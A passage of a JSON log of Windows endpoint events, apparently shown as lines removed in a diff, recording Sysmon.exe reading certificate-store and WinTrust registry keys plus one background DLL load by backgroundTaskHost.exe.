"{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883571690740000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883571690740000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883571690740000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883571690740000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": 
"HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883571690740000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883571690740000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883571690740000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883571690740000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883571690740000, - "unique_pid": 
"{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883571690740000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883571690740000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883571690740000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883571690740000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": 
"HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883571690740000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883571690740000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883571690740000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883571690740000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883571690740000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - 
"process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883571690740000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883571690740000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883571690740000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", - "registry_value": "Software Publishing", - "timestamp": 131883571690740000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "image_load", - "image_name": "ContentDeliveryManager.Background.dll", - "image_path": "C:\\Windows\\SystemApps\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\ContentDeliveryManager.Background.dll", - "pid": 6376, - "process_name": "backgroundTaskHost.exe", - 
"process_path": "C:\\Windows\\System32\\backgroundTaskHost.exe", - "timestamp": 131883571690580000, - "unique_pid": "{42FC7E13-CB30-5C05-0000-0010ACE05001}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883571691050000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883571691050000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883571691050000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883571691050000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": 
"C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883571691050000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883571691050000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883571691050000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883571691050000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": 
"HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883571691050000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883571691050000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883571691050000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883571691050000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883571691050000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - 
"registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883571691050000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883571691050000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883571691050000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883571691050000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883571691050000, - "unique_pid": 
"{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883571691050000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883571691050000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883571691050000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883571691050000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": 
"HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883571691050000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", - "registry_value": "Software Publishing", - "timestamp": 131883571691050000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", - "registry_value": "Software Publishing", - "timestamp": 131883571691050000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", - "registry_value": "Software Publishing", - "timestamp": 131883571691050000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - 
"registry_value": "Disallowed", - "timestamp": 131883571691210000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883571691210000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883571691210000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883571691210000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883571691210000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - 
"registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883571691210000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883571691210000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883571691210000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883571691210000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - 
"timestamp": 131883571691210000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883571691210000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883571691210000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883571691210000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883571691210000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates", - "registry_path": 
